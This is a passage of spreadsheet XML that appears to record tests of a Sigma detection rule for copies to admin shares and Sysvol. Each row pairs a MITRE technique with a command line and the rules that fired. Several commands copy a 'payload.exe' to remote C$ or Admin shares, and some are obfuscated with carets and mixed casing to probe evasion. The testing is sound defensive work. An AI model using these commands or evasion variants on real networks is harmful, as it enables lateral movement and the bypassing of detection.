        <v>1</v>
      </c>
      <c r="G52" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H52" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I52" s="6" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J52" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K52" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="53" ht="15.75" customHeight="1" s="42">
      <c r="A53" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B53" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C53" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D53" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E53" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnd "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F53" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G53" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H53" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I53" s="6" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J53" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K53" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" s="42">
      <c r="A54" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B54" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C54" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D54" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E54" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMaND "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F54" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G54" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H54" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I54" s="6" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J54" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K54" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" s="42">
      <c r="A55" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B55" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C55" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D55" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E55" s="6" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F55" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G55" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H55" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I55" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J55" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K55" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" s="42">
      <c r="A56" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B56" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C56" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D56" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E56" s="6" t="inlineStr">
        <is>
          <t>powershell -nop -commAND "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F56" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G56" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H56" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I56" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J56" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K56" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="57" ht="15.75" customHeight="1" s="42">
      <c r="A57" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B57" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C57" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D57" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E57" s="6" t="inlineStr">
        <is>
          <t>powershell -NoPRofILE -comMand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F57" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G57" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H57" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I57" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J57" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K57" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="58" ht="15.75" customHeight="1" s="42">
      <c r="A58" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B58" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C58" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D58" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E58" s="6" t="inlineStr">
        <is>
          <t>powershell -nOPrOFiLE -c "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F58" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G58" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H58" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I58" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J58" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K58" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="59" ht="15.75" customHeight="1" s="42">
      <c r="A59" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B59" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C59" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D59" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E59" s="6" t="inlineStr">
        <is>
          <t>powershell -NoProfILe -cOmmand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F59" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G59" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H59" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I59" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J59" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K59" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="60" ht="15.75" customHeight="1" s="42">
      <c r="A60" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B60" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C60" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D60" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E60" s="6" t="inlineStr">
        <is>
          <t>powershell -nop -COmMANd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F60" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G60" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H60" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I60" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J60" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K60" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="61" ht="15.75" customHeight="1" s="42">
      <c r="A61" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B61" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C61" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D61" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E61" s="6" t="inlineStr">
        <is>
          <t>cmd.exe /"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F61" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G61" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H61" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I61" s="6" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f); Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f)</t>
        </is>
      </c>
      <c r="J61" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K61" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="62" ht="15.75" customHeight="1" s="42">
      <c r="A62" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B62" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C62" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D62" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E62" s="6" t="inlineStr">
        <is>
          <t>cmd.exe -"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F62" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G62" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H62" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I62" s="6" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f); Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f)</t>
        </is>
      </c>
      <c r="J62" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K62" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="63" ht="15.75" customHeight="1" s="42">
      <c r="A63" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B63" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C63" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D63" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E63" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F63" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G63" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H63" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I63" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J63" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K63" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="64" ht="15.75" customHeight="1" s="42">
      <c r="A64" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B64" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C64" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D64" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E64" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F64" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G64" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H64" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I64" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J64" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K64" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="65" ht="15.75" customHeight="1" s="42">
      <c r="A65" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B65" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C65" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D65" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E65" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -ComMaNd "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F65" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G65" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H65" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I65" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J65" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K65" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="66" ht="15.75" customHeight="1" s="42">
      <c r="A66" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B66" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C66" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D66" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E66" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -comManD "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F66" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G66" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H66" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I66" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J66" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K66" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="67" ht="15.75" customHeight="1" s="42">
      <c r="A67" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B67" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C67" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D67" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E67" s="6" t="inlineStr">
        <is>
          <t>cmd.exe /C c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F67" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G67" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H67" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I67" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J67" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K67" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="68" ht="15.75" customHeight="1" s="42">
      <c r="A68" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B68" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C68" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D68" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E68" s="6" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F68" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G68" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H68" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I68" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J68" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K68" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="69" ht="15.75" customHeight="1" s="42">
      <c r="A69" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B69" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C69" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D69" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E69" s="6" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F69" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G69" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H69" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I69" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J69" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K69" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="70" ht="15.75" customHeight="1" s="42">
      <c r="A70" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B70" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C70" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D70" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E70" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F70" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G70" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H70" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I70" s="6" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J70" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K70" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="71" ht="15.75" customHeight="1" s="42">
      <c r="A71" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B71" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C71" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D71" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E71" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -c "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F71" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G71" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H71" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I71" s="6" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J71" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K71" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="72" ht="15.75" customHeight="1" s="42">
      <c r="A72" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B72" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C72" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D72" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E72" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnd "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F72" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G72" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H72" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I72" s="6" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J72" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K72" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="73" ht="15.75" customHeight="1" s="42">
      <c r="A73" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B73" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C73" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D73" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E73" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMaND "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F73" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G73" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H73" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I73" s="6" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J73" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K73" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="74" ht="15.75" customHeight="1" s="42">
      <c r="A74" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B74" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C74" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D74" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E74" s="6" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F74" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G74" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H74" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I74" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J74" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K74" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="75" ht="15.75" customHeight="1" s="42">
      <c r="A75" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B75" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C75" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D75" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E75" s="6" t="inlineStr">
        <is>
          <t>powershell -nop -commAND "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F75" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G75" s="6" t="b">
        <v>0</v>
      </c>
